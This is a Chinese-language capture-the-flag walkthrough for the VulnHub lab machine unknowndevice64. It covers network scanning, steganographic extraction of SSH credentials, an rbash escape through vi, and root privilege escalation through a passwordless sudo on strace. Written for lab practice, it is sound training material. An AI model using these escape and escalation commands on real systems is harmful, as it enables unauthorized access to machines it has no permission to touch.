靶机渗透—unknowndevice64

下载地址

download unknowndevice64

地址：https://www.vulnhub.com/entry/unknowndevice64-1,293/

渗透

IP扫描

sudo arp-scan -l //确定靶机IP地址

扫描到的靶机IP地址是 192.168.10.129

端口扫描

sudo nmap -p- 192.168.10.129 //靶机开放端口

sudo nmap -p- -sV 192.168.10.129 //确定端口服务与版本信息

http端口访问

访问网站  http://192.168.10.129:31337

查看源码

发现一个.jpg文件

访问  http://192.168.10.129:31337/key_is_h1dd3n.jpg

发现有一张可能隐写的图片，下载到 /home

或者 dirsearch -u 192.168.10.129:31337//寻找网站中敏感信息和目录

steghide extract -sf key_is_h1dd3n.jpg  //使用steghide解密隐藏信息

密码是h1dd3n

打开解密后的.txt文件，发现了一串brainfuck加密的代码

通过在线解密网站（https://www.splitbrain.org/seivices/ook）
另一个在线解密网站(http://www.hiencode.com/brain.html)破译BF代码，得到ssh登录口令

ssh端口访问

ssh ud64@192.168.10.129 -p 1337 //ssh端口登录

查看可用命令
发现一般的命令都不可以使用，此时需要逃逸

rbash逃逸

//在 vi 命令行下，键入:!/bin/bash进入bash
vi ud64
:!/bin/bash

echo $PATH //查看可执行文件的位置
echo /home/ud64/prog/*(*的意思是按两次Tab) //查看可执行文件

使用vi逃逸

使用export修改环境变量，以致我们可以使用sudo命令

export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH

提权

sudo -l //查看当前用户可以执行的内容

发现了一个不需要密码的文件

sudo sysud64 ls /root 
sudo sysud64 cat /root/flag.txt

sudo sysud64 -o /dev/null /bin/bash  //提权

strace